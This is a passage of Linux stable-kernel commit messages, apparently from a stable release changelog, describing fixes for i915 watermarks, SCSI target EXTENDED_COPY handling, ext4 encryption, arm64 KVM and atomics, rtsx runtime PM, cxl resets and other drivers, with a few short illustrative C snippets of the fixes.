zeroing out a plane's watermarks in the middle of the atomic commit
without restoring them later.
Simple reproduction recipe:
- Get a SKL laptop, launch any kind of X session
- Get two extra monitors
- Keep hotplugging both displays (so that the display configuration
jumps from 1 active pipe to 3 active pipes and back)
- Eventually underrun
Changes since v1:
- Fix incorrect use of "it's"
Changes since v2:
- Add reproduction recipe
Signed-off-by: Lyude <cpaul@redhat.com>
Cc: Maarten Lankhorst <maarten.lankhorst@linux.intel.com>
Fixes: 62e0fb8801 ("drm/i915/skl: Update plane watermarks atomically during plane updates")
Signed-off-by: Lyude <cpaul@redhat.com>
Testcase: kms_plane
Signed-off-by: Maarten Lankhorst <maarten.lankhorst@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1472488288-27280-1-git-send-email-cpaul@redhat.com
Cc: drm-intel-fixes@lists.freedesktop.org
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 27082493e9 upstream.
Now that we can hook into update_crtcs and control the order in which we
update CRTCs at each modeset, we can finish the final step of fixing
Skylake's watermark handling by performing DDB updates at the same time
as plane updates and watermark updates.
The first major change in this patch is skl_update_crtcs(), which
handles ensuring that we order each CRTC update in our atomic commits
properly so that they honor the DDB flush order.
The second major change in this patch is the order in which we flush the
pipes. While the previous order may have worked, it can't be used in
this approach since it no longer will do the right thing. For example,
using the old ddb flush order:
We have pipes A, B, and C enabled, and we're disabling C. Initial ddb
allocation looks like this:
| A | B |xxxxxxx|
Since we're performing the ddb updates after performing any CRTC
disablements in intel_atomic_commit_tail(), the space to the right of
pipe B is unallocated.
1. Flush pipes with new allocation contained into old space. None
apply, so we skip this
2. Flush pipes having their allocation reduced, but overlapping with a
previous allocation. None apply, so we also skip this
3. Flush pipes that got more space allocated. This applies to A and B,
giving us the following update order: A, B
This is wrong, since updating pipe A first will cause it to overlap with
B and potentially burst into flames. Our new order (see the code
comments for details) would update the pipes in the proper order: B, A.
As well, we calculate the order for each DDB update during the check
phase, and reference it later in the commit phase when we hit
skl_update_crtcs().
This long overdue patch fixes the rest of the underruns on Skylake.
Changes since v1:
- Add skl_ddb_entry_write() for cursor into skl_write_cursor_wm()
Changes since v2:
- Use the method for updating CRTCs that Ville suggested
- In skl_update_wm(), only copy the watermarks for the crtc that was
passed to us
Changes since v3:
- Small comment fix in skl_ddb_allocation_overlaps()
Changes since v4:
- Remove the second loop in intel_update_crtcs() and use Ville's
suggestion for updating the ddb allocations in the right order
- Get rid of the second loop and just use the ddb state as it updates
to determine what order to update everything in (thanks for the
suggestion Ville)
- Simplify skl_ddb_allocation_overlaps()
- Split actual overlap checking into its own helper
Fixes: 0e8fb7ba7c ("drm/i915/skl: Flush the WM configuration")
Fixes: 8211bd5bdf ("drm/i915/skl: Program the DDB allocation")
[omitting CC for stable, since this patch will need to be changed for
such backports first]
Testcase: kms_cursor_legacy
Testcase: plane-all-modeset-transition
Signed-off-by: Lyude <cpaul@redhat.com>
Cc: Ville Syrjälä <ville.syrjala@linux.intel.com>
Cc: Daniel Vetter <daniel.vetter@intel.com>
Cc: Radhakrishna Sripada <radhakrishna.sripada@intel.com>
Cc: Hans de Goede <hdegoede@redhat.com>
Cc: Matt Roper <matthew.d.roper@intel.com>
Signed-off-by: Maarten Lankhorst <maarten.lankhorst@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1471961565-28540-2-git-send-email-cpaul@redhat.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 62e0fb8801 upstream.
Thanks to Ville for suggesting this as a potential solution to pipe
underruns on Skylake.
On Skylake all of the registers for configuring planes, including the
registers for configuring their watermarks, are double buffered. New
values written to them won't take effect until said registers are
"armed", which is done by writing to the PLANE_SURF (or in the case of
cursor planes, the CURBASE register) register.
With this in mind, up until now we've been updating watermarks on skl
like this:
non-modeset {
- calculate (during atomic check phase)
- finish_atomic_commit:
- intel_pre_plane_update:
- intel_update_watermarks()
- {vblank happens; new watermarks + old plane values => underrun }
- drm_atomic_helper_commit_planes_on_crtc:
- start vblank evasion
- write new plane registers
- end vblank evasion
}
or
modeset {
- calculate (during atomic check phase)
- finish_atomic_commit:
- crtc_enable:
- intel_update_watermarks()
- {vblank happens; new watermarks + old plane values => underrun }
- drm_atomic_helper_commit_planes_on_crtc:
- start vblank evasion
- write new plane registers
- end vblank evasion
}
Now we update watermarks atomically like this:
non-modeset {
- calculate (during atomic check phase)
- finish_atomic_commit:
- intel_pre_plane_update:
- intel_update_watermarks() (wm values aren't written yet)
- drm_atomic_helper_commit_planes_on_crtc:
- start vblank evasion
- write new plane registers
- write new wm values
- end vblank evasion
}
modeset {
- calculate (during atomic check phase)
- finish_atomic_commit:
- crtc_enable:
- intel_update_watermarks() (actual wm values aren't written
yet)
- drm_atomic_helper_commit_planes_on_crtc:
- start vblank evasion
- write new plane registers
- write new wm values
- end vblank evasion
}
So this patch moves all of the watermark writes into the right place;
inside of the vblank evasion where we update all of the registers for
each plane. While this patch doesn't fix everything, it does allow us to
update the watermark values in the way the hardware expects us to.
Changes since original patch series:
- Remove mutex_lock/mutex_unlock since they don't do anything and we're
not touching global state
- Move skl_write_cursor_wm/skl_write_plane_wm functions into
intel_pm.c, make externally visible
- Add skl_write_plane_wm calls to skl_update_plane
- Fix the conditional of the for loop in skl_write_plane_wm (level < max_level
should be level <= max_level)
- Make diagram in commit more accurate to what's actually happening
- Add Fixes:
Changes since v1:
- Use IS_GEN9() instead of IS_SKYLAKE() since these fixes apply to more
than just Skylake
- Update description to make it clear this patch doesn't fix everything
- Check if pipes were actually changed before writing watermarks
Changes since v2:
- Write PIPE_WM_LINETIME during vblank evasion
Changes since v3:
- Rebase against new SAGV patch changes
Changes since v4:
- Add a parameter to choose what skl_wm_values struct to use when
writing new plane watermarks
Changes since v5:
- Remove cursor ddb entry write in skl_write_cursor_wm(), defer until
patch 6
- Write WM_LINETIME in intel_begin_crtc_commit()
Changes since v6:
- Remove redundant dirty_pipes check in skl_write_plane_wm (we check
this in all places where we call this function, and it was supposed
to have been removed earlier anyway)
- In i9xx_update_cursor(), use dev_priv->info.gen >= 9 instead of
IS_GEN9(dev_priv). We do this everywhere else and I'd imagine this
needs to be done for gen10 as well
Changes since v7:
- Fix rebase fail (unused variable obj)
- Make struct skl_wm_values *wm const
- Fix indenting
- Use INTEL_GEN() instead of dev_priv->info.gen
Changes since v8:
- Don't forget calls to skl_write_plane_wm() when disabling planes
- Use INTEL_GEN(), not INTEL_INFO()->gen in intel_begin_crtc_commit()
Fixes: 2d41c0b59a ("drm/i915/skl: SKL Watermark Computation")
Signed-off-by: Lyude <cpaul@redhat.com>
Reviewed-by: Matt Roper <matthew.d.roper@intel.com>
Cc: stable@vger.kernel.org
Cc: Ville Syrjälä <ville.syrjala@linux.intel.com>
Cc: Daniel Vetter <daniel.vetter@intel.com>
Cc: Radhakrishna Sripada <radhakrishna.sripada@intel.com>
Cc: Hans de Goede <hdegoede@redhat.com>
Signed-off-by: Maarten Lankhorst <maarten.lankhorst@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1471884608-10671-1-git-send-email-cpaul@redhat.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4973ca9a01 upstream.
The Akai MIDImix (09e8:0031) is a MIDI fader controller that speaks
regular MIDI and works well with Linux. However, initialization gets
delayed due to reports timeout:
[3643645.631124] hid-generic 0003:09E8:0031.0020: timeout initializing reports
[3643645.632416] hid-generic 0003:09E8:0031.0020: hiddev0: USB HID v1.11 Device [AKAI MIDI Mix] on usb-0000:00:14.0-2/input0
Adding "usbhid.quirks=0x09e8:0x0031:0x20000000" on the kernel
command line makes the issues go away.
Signed-off-by: Steinar H. Gunderson <sgunderson@bigfoot.com>
Signed-off-by: Jiri Kosina <jkosina@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6cc4758ae9 upstream.
Since using clk_register_divider to set up the pixel clock, regmap
is no longer used. Regmap did take care of the DCU's different
endianness. Check endianness using the device-tree property
"big-endian" to determine the location of DIV_RATIO.
Fixes: 2d701449bc ("drm/fsl-dcu: use common clock framework for pixel clock divider")
Reported-by: Meng Yi <meng.yi@nxp.com>
Signed-off-by: Stefan Agner <stefan@agner.ch>
Tested-by: Meng Yi <meng.yi@nxp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 51ab70bed9 upstream.
With older hardware versions, the user could specify arbitrarily large
command buffer sizes, causing vmalloc / vmap space exhaustion.
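The shape of the fix is a simple sanity check on the user-supplied size
before the buffer is set up (the limit name and value here are made up for
illustration):

    #define ILLUSTRATIVE_MAX_CMDBUF_SIZE SZ_1M      /* hypothetical cap */

    if (size > ILLUSTRATIVE_MAX_CMDBUF_SIZE)
            return -EINVAL;  /* refuse absurd sizes instead of vmalloc'ing them */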
Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com>
Reviewed-by: Brian Paul <brianp@vmware.com>
Reviewed-by: Sinclair Yeh <syeh@vmware.com>
Signed-off-by: Sinclair Yeh <syeh@vmware.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 140c94da3c upstream.
All other amdgpu/dce_v* files have this call; it's only mysteriously
been missing from dce_v11_0.c since the file was added, which causes leaks.
Fixes: aaa36a976b ("drm/amdgpu: Add initial VI support")
Signed-off-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7edabee06a upstream.
With the introduction of bin/render pipelining, the previous job may
not be completed when we start binning the next one. If the previous
job wrote our VBO, IB, or CS textures, then the binning stage might
get stale or uninitialized results.
Fixes the major rendering failure in glmark2 -b terrain.
Signed-off-by: Eric Anholt <eric@anholt.net>
Fixes: ca26d28bba ("drm/vc4: improve throughput by pipelining binning and rendering jobs")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 61f36166c2 upstream.
This reverts commit c1ccbfe031.
Reverting this patch, as it incorrectly assumes the additional length
for INQUIRY in target_complete_cmd_with_length() is SCSI allocation
length, which breaks existing user-space code when SCSI allocation
length is smaller than additional length.
root@scsi-mq:~# sg_inq --len=4 -vvvv /dev/sdb
found bsg_major=253
open /dev/sdb with flags=0x800
inquiry cdb: 12 00 00 00 04 00
duration=0 ms
inquiry: pass-through requested 4 bytes (data-in) but got -28 bytes
inquiry: pass-through can't get negative bytes, say it got none
inquiry: got too few bytes (0)
INQUIRY resid (32) should never exceed requested len=4
inquiry: failed requesting 4 byte response: Malformed response to
SCSI command [resid=32]
AFAICT the original change was not to address a specific host issue,
so go ahead and revert to original logic for now.
Cc: Douglas Gilbert <dgilbert@interlog.com>
Cc: Martin K. Petersen <martin.petersen@oracle.com>
Cc: Sumit Rai <sumitrai96@gmail.com>
Signed-off-by: Nicholas Bellinger <nab@linux-iscsi.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 926317de33 upstream.
This patch addresses a bug where a local EXTENDED_COPY WRITE or READ
backend I/O request would always return SAM_STAT_CHECK_CONDITION,
even if underlying xcopy_pt_cmd->se_cmd generated a different
SCSI status code.
ESX host environments expect to hit SAM_STAT_RESERVATION_CONFLICT
for certain scenarios, and SAM_STAT_CHECK_CONDITION results in
non-retriable status for these cases.
Tested on v4.1.y with ESX v5.5u2+ with local IBLOCK backend copy.
Reported-by: Nixon Vincent <nixon.vincent@calsoftinc.com>
Tested-by: Nixon Vincent <nixon.vincent@calsoftinc.com>
Cc: Nixon Vincent <nixon.vincent@calsoftinc.com>
Tested-by: Dinesh Israni <ddi@datera.io>
Signed-off-by: Dinesh Israni <ddi@datera.io>
Cc: Dinesh Israni <ddi@datera.io>
Signed-off-by: Nicholas Bellinger <nab@linux-iscsi.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 449a137846 upstream.
This patch addresses a bug where EXTENDED_COPY across multiple LUNs
results in a CHECK_CONDITION when the source + destination are not
located on the same physical node.
ESX Host environments expect sense COPY_ABORTED w/ COPY TARGET DEVICE
NOT REACHABLE to be returned when this occurs, in order to signal
fallback to local copy method.
As described in section 6.3.3 of spc4r22:
"If it is not possible to complete processing of a segment because the
copy manager is unable to establish communications with a copy target
device, because the copy target device does not respond to INQUIRY,
or because the data returned in response to INQUIRY indicates
an unsupported logical unit, then the EXTENDED COPY command shall be
terminated with CHECK CONDITION status, with the sense key set to
COPY ABORTED, and the additional sense code set to COPY TARGET DEVICE
NOT REACHABLE."
Tested on v4.1.y with ESX v5.5u2+ with BlockCopy across multiple nodes.
Reported-by: Nixon Vincent <nixon.vincent@calsoftinc.com>
Tested-by: Nixon Vincent <nixon.vincent@calsoftinc.com>
Cc: Nixon Vincent <nixon.vincent@calsoftinc.com>
Tested-by: Dinesh Israni <ddi@datera.io>
Signed-off-by: Dinesh Israni <ddi@datera.io>
Cc: Dinesh Israni <ddi@datera.io>
Signed-off-by: Nicholas Bellinger <nab@linux-iscsi.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 527268df31 upstream.
This patch fixes a regression in >= v4.1.y code where the original
SCF_ACK_KREF assignment in target_get_sess_cmd() was dropped upstream
in commit 054922bb, but the series for addressing TMR ABORT_TASK +
LUN_RESET with fabric session reinstatement in commit febe562c20 still
depends on this code in transport_cmd_finish_abort().
The regression manifests itself as a se_cmd->cmd_kref +1 leak, where
ABORT_TASK + LUN_RESET can hang indefinitely for a specific I_T session
for drivers using SCF_ACK_KREF, resulting in hung kthreads.
This patch has been verified with v4.1.y code.
Reported-by: Vaibhav Tandon <vst@datera.io>
Tested-by: Vaibhav Tandon <vst@datera.io>
Cc: Vaibhav Tandon <vst@datera.io>
Signed-off-by: Nicholas Bellinger <nab@linux-iscsi.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1ba0158fa6 upstream.
The libfc stack assigns exchange IDs based on the CPU the request
was received on, so we need to send the responses via the same CPU.
Otherwise the send logic gets confused and responses will be delayed,
causing exchange timeouts on the initiator side.
Signed-off-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Nicholas Bellinger <nab@linux-iscsi.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 843741c577 upstream.
When the operation fails we also have to undo the changes
we made to ->xattr_names. Otherwise listxattr() will report
wrong lengths.
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 559cce698e upstream.
When 'jh->b_transaction == transaction' (asserted by below)
J_ASSERT_JH(jh, (jh->b_transaction == transaction || ...
'journal->j_list_lock' will be incorrectly unlocked, since
the lock is acquired only at the end of the if / else-if
statements (missing the else case).
Signed-off-by: Taesoo Kim <tsgatesv@gmail.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
Fixes: 6e4862a5bb
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c4704a4fbe upstream.
The sysfs file /sys/fs/ext4/features/encryption was present on kernels
compiled with CONFIG_EXT4_FS_ENCRYPTION=n. This was misleading because
such kernels do not actually support ext4 encryption. Therefore, only
provide this file on kernels compiled with CONFIG_EXT4_FS_ENCRYPTION=y.
Note: since the ext4 feature files are all hardcoded to have a contents
of "supported", it really is the presence or absence of the file that is
significant, not the contents (and this change reflects that).
Signed-off-by: Eric Biggers <ebiggers@google.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8906a8223a upstream.
i_rwsem needs to be acquired while setting an encryption policy so that
concurrent calls to FS_IOC_SET_ENCRYPTION_POLICY are correctly
serialized (especially the ->get_context() + ->set_context() pair), and
so that new files cannot be created in the directory during or after the
->empty_dir() check.
Signed-off-by: Eric Biggers <ebiggers@google.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fb4454376d upstream.
The XTS tweak (or IV) was initialized differently on little endian and
big endian systems. Because the ciphertext depends on the XTS tweak, it
was not possible to use an encrypted filesystem created by a little
endian system on a big endian system and vice versa, even if they shared
the same PAGE_SIZE. Fix this by always using little endian.
This will break hypothetical big endian users of ext4 or f2fs
encryption. However, all users we are aware of are little endian, and
it's believed that "real" big endian users are unlikely to exist yet.
So this might as well be fixed now before it's too late.
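A sketch of the endian-independent tweak derivation (function, buffer and
length names are illustrative; kernel context assumed):

    static void fill_xts_tweak(u8 *iv, unsigned int ivsize, u64 index)
    {
            __le64 tweak = cpu_to_le64(index);  /* same bytes on LE and BE */

            memset(iv, 0, ivsize);
            memcpy(iv, &tweak, sizeof(tweak));
    }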
Signed-off-by: Eric Biggers <ebiggers@google.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a5efb6b6c9 upstream.
Usually a validity intercept is a programming error of the host
because of invalid entries in the state description.
We can get a validity intercept if the mode of the runtime
instrumentation control block is wrong. As the host does not know
which modes are valid, this can be used by userspace to trigger
a WARN.
Instead of printing a WARN let's return an error to userspace as
this can only happen if userspace provides a malformed initial
value (e.g. on migration). The kernel should never warn on bogus
input. Instead let's log it into the s390 debug feature.
While at it, let's return -EINVAL for all validity intercepts as
this will trigger an error in QEMU like
error: kvm run failed Invalid argument
PSW=mask 0404c00180000000 addr 000000000063c226 cc 00
R00=000000000000004f R01=0000000000000004 R02=0000000000760005 R03=000000007fe0a000
R04=000000000064ba2a R05=000000049db73dd0 R06=000000000082c4b0 R07=0000000000000041
R08=0000000000000002 R09=000003e0804042a8 R10=0000000496152c42 R11=000000007fe0afb0
[...]
This will avoid an endless loop of validity intercepts.
Fixes: c6e5f16637 ("KVM: s390: implement the RI support of guest")
Acked-by: Fan Zhang <zhangfan@linux.vnet.ibm.com>
Reviewed-by: Pierre Morel <pmorel@linux.vnet.ibm.com>
Signed-off-by: Christian Borntraeger <borntraeger@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4f48aa7a11 upstream.
Accesses of the rtsx sdmmc's parent device, which is the rtsx usb device,
must be done when it's runtime resumed. Currently this isn't the case when
changing the LED, so let's fix this by adding a pm_runtime_get_sync() and
a pm_runtime_put() around those operations.
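The pattern is the usual runtime-PM bracket around the hardware access
(sketch; the LED callback details are elided and 'dev' stands for the sdmmc
device whose parent is the rtsx usb device):

    #include <linux/pm_runtime.h>

    pm_runtime_get_sync(dev);   /* make sure the parent usb device is resumed */
    /* ... touch the LED register of the rtsx usb device ... */
    pm_runtime_put(dev);        /* drop the reference, allow runtime suspend */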
Reported-by: Ritesh Raj Sarraf <rrs@researchut.com>
Tested-by: Ritesh Raj Sarraf <rrs@researchut.com>
Cc: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 31cf742f51 upstream.
The rtsx_usb_sdmmc driver may bail out in its ->set_ios() callback when no
SD card is inserted. This is wrong, as it could cause the device to remain
runtime resumed when it's unused. Fix this behaviour.
Tested-by: Ritesh Raj Sarraf <rrs@researchut.com>
Cc: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1720d3545b upstream.
When introducing hs400es, I didn't notice that we hadn't
switched the voltage to 1V2 or 1V8 for it. That happens to work
because the first controller claiming to support hs400es, arasan(5.1),
is designed to support only 1V8, so the voltage is effectively fixed at 1V8.
But this is actually wrong, and will not fit other host controllers.
Let's fix it.
Fixes: commit 81ac2af657 ("mmc: core: implement enhanced strobe support")
Signed-off-by: Shawn Lin <shawn.lin@rock-chips.com>
Reviewed-by: Douglas Anderson <dianders@chromium.org>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d2cf909cda upstream.
If a cxl adapter faults on an invalid address for a kernel context, we
may enter copro_calculate_slb() with a NULL mm pointer (kernel
context) and an effective address that looks like a user
address, which will cause a crash when dereferencing mm. It is clearly
an AFU bug, but there's no reason to crash either. So return an error,
so that cxl can ack the interrupt with an address error.
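The guard itself is tiny; a sketch of the check at the top of
copro_calculate_slb():

    if (!mm)
            return -EFAULT; /* kernel context faulting on a user-looking EA:
                             * report an address error instead of crashing */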
Fixes: 73d16a6e0e ("powerpc/cell: Move data segment faulting code out of cell platform")
Signed-off-by: Frederic Barrat <fbarrat@linux.vnet.ibm.com>
Acked-by: Ian Munsie <imunsie@au1.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0d7718f666 upstream.
In case __ceph_do_getattr returns an error and the retry_op in
ceph_read_iter is not READ_INLINE, then it's possible to invoke
__free_page on a page which is NULL; this naturally leads to a crash.
This can happen when, for example, a process waiting on a MDS reply
receives sigterm.
Fix this by explicitly checking whether the page is set or not.
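The fix boils down to a NULL check before the free (sketch):

    if (page)
            __free_page(page);  /* the page may never have been allocated if
                                 * __ceph_do_getattr() returned an error */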
Signed-off-by: Nikolay Borisov <kernel@kyup.com>
Reviewed-by: Yan, Zheng <zyan@redhat.com>
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 60e21a0ef5 upstream.
The WnR bit in the HSR/ESR_EL2 indicates whether a data abort was
generated by a read or a write instruction. For stage 2 data aborts
generated by a stage 1 translation table walk (i.e. the actual page
table access faults at EL2), the WnR bit therefore reports whether the
instruction generating the walk was a load or a store, *not* whether the
page table walker was reading or writing the entry.
For page tables marked as read-only at stage 2 (e.g. due to KSM merging
them with the tables from another guest), this could result in livelock,
where a page table walk generated by a load instruction attempts to
set the access flag in the stage 1 descriptor, but fails to trigger
CoW in the host since only a read fault is reported.
This patch modifies the arm64 kvm_vcpu_dabt_iswrite function to
take into account stage 2 faults in stage 1 walks. Since DBM cannot be
disabled at EL2 for CPUs that implement it, we assume that these faults
are always caused by writes, avoiding the livelock situation at the
expense of occasional, spurious CoWs.
We could, in theory, do a bit better by checking the guest TCR
configuration and inspecting the page table to see why the PTE faulted.
However, I doubt this is measurable in practice, and the threat of
livelock is real.
Cc: Julien Grall <julien.grall@arm.com>
Reviewed-by: Marc Zyngier <marc.zyngier@arm.com>
Reviewed-by: Christoffer Dall <christoffer.dall@linaro.org>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 87261d1904 upstream.
Commit 7dd01aef05 ("arm64: trap userspace "dc cvau" cache operation on
errata-affected core") adds code to execute cache maintenance instructions
in the kernel on behalf of userland on CPUs with certain ARM CPU errata.
It turns out that the address hasn't been checked to be a valid user
space address, allowing userland to clean cache lines in kernel space.
Fix this by introducing an address check before executing the
instructions on behalf of userland.
Since the address doesn't come via a syscall parameter, we can't just
reject tagged pointers and instead have to remove the tag when checking
against the user address limit.
Fixes: 7dd01aef05 ("arm64: trap userspace "dc cvau" cache operation on errata-affected core")
Reported-by: Kristina Martsenko <kristina.martsenko@arm.com>
Signed-off-by: Andre Przywara <andre.przywara@arm.com>
[will: rework commit message + replace access_ok with max_user_addr()]
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 850540351b upstream.
Commit f436b2ac90 ("arm64: kernel: fix architected PMU registers
unconditional access") made sure we wouldn't access unimplemented
PMU registers, but also left MDCR_EL2 uninitialized in that case,
leading to trap bits being potentially left set.
Make sure we always write something in that register.
Fixes: f436b2ac90 ("arm64: kernel: fix architected PMU registers unconditional access")
Cc: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Cc: Will Deacon <will.deacon@arm.com>
Signed-off-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1e6e57d9b3 upstream.
Writing the outer loop of an LL/SC sequence using do {...} while
constructs potentially allows the compiler to hoist memory accesses
between the STXR and the branch back to the LDXR. On CPUs that do not
guarantee forward progress of LL/SC loops when faced with memory
accesses to the same ERG (up to 2k) between the failed STXR and the
branch back, we may end up livelocking.
This patch avoids this issue in our percpu atomics by rewriting the
outer loop as part of the LL/SC inline assembly block.
Fixes: f97fc81079 ("arm64: percpu: Implement this_cpu operations")
Reviewed-by: Mark Rutland <mark.rutland@arm.com>
Tested-by: Mark Rutland <mark.rutland@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9c0e83c371 upstream.
As it turns out, the KASLR code breaks CONFIG_MODVERSIONS, since the
kcrctab has an absolute address field that is relocated at runtime
when the kernel offset is randomized.
This has been fixed already for PowerPC in the past, so simply wire up
the existing code dealing with this issue.
Fixes: f80fb3a3d5 ("arm64: add support for kernel ASLR")
Tested-by: Timur Tabi <timur@codeaurora.org>
Signed-off-by: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1c5b51dfb7 upstream.
If a CPU does not implement a global monitor for certain memory types,
then userspace can attempt a kernel DoS by issuing SWP instructions
targeting the problematic memory (for example, a framebuffer mapped
with non-cacheable attributes).
The SWP emulation code protects against these sorts of attacks by
checking for pending signals and potentially rescheduling when the STXR
instruction fails during the emulation. Whilst this is good for avoiding
livelock, it harms emulation of legitimate SWP instructions on CPUs
where forward progress is not guaranteed if there are memory accesses to
the same reservation granule (up to 2k) between the failing STXR and
the retry of the LDXR.
This patch solves the problem by retrying the STXR a bounded number of
times (4) before breaking out of the LL/SC loop and looking for
something else to do.
Fixes: bd35a4adc4 ("arm64: Port SWP/SWPB emulation support from arm")
Reviewed-by: Mark Rutland <mark.rutland@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9158cb29e7 upstream.
Accesses to the rtsx usb device, which is the parent of the rtsx memstick
device, must not be done unless it's runtime resumed. This is currently not
the case and it could trigger various errors.
Fix this by properly dealing with runtime PM in this regard. This means
making sure the device is runtime resumed when serving requests via the
->request() callback or changing settings via the ->set_param() callbacks.
Cc: Ritesh Raj Sarraf <rrs@researchut.com>
Cc: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 796aa46adf upstream.
Accesses to the rtsx usb device, which is the parent of the rtsx memstick
device, must not be done unless it's runtime resumed.
Therefore when the rtsx_usb_ms driver polls for inserted memstick cards,
let's add pm_runtime_get|put*() to make sure accesses are done when the
rtsx usb device is runtime resumed.
Reported-by: Ritesh Raj Sarraf <rrs@researchut.com>
Tested-by: Ritesh Raj Sarraf <rrs@researchut.com>
Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a2ed0b391d upstream.
When isofs_mount() is called to mount a device read-write, it returns
EACCES even before it checks that the device actually contains an isofs
filesystem. This may confuse mount(8) which then tries to mount all
subsequent filesystem types in read-only mode.
Fix the problem by returning EACCES only once we verify that the device
indeed contains an iso9660 filesystem.
Fixes: 17b7f7cf58
Reported-by: Kent Overstreet <kent.overstreet@gmail.com>
Reported-by: Karel Zak <kzak@redhat.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 70b565bbdb upstream.
This patch prevents resetting the cxl adapter via sysfs in the presence of
one or more active cxl_contexts on it. This protects against an
unrecoverable error caused by the PSL owning a dirty cache line even after
reset, when the host tries to touch the same cache line. In case a force reset
of the card is required irrespective of any active contexts, the int
value -1 can be stored in the 'reset' sysfs attribute of the card.
The patch introduces a new atomic_t member named contexts_num inside
struct cxl that holds the number of active contexts attached to the card,
which is checked against '0' before proceeding with the reset. To
protect against a race condition where a context is activated just after
the reset check is performed, contexts_num is atomically set to '-1'
after the check to indicate that no more contexts can be activated on
the card.
Before activating a context we atomically test whether contexts_num is
non-negative and, if so, increment its value by one. If the value of
contexts_num is negative, it indicates that the card is about to be
reset and context activation is errored out at that point.
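Both sides of that protocol map naturally onto existing atomic primitives;
a sketch (the struct and field names follow the description above):

    #include <linux/atomic.h>

    /* Reset path: proceed only when no contexts are active, and atomically
     * park the counter at -1 so no new context can be activated. */
    if (atomic_cmpxchg(&adapter->contexts_num, 0, -1) != 0)
            return -EBUSY;

    /* Context activation path: bump the counter unless a reset is pending. */
    if (!atomic_inc_unless_negative(&adapter->contexts_num))
            return -EBUSY;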
Fixes: 62fa19d4b4 ("cxl: Add ability to reset the card")
Acked-by: Frederic Barrat <fbarrat@linux.vnet.ibm.com>
Reviewed-by: Andrew Donnellan <andrew.donnellan@au1.ibm.com>
Signed-off-by: Vaibhav Jain <vaibhav@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
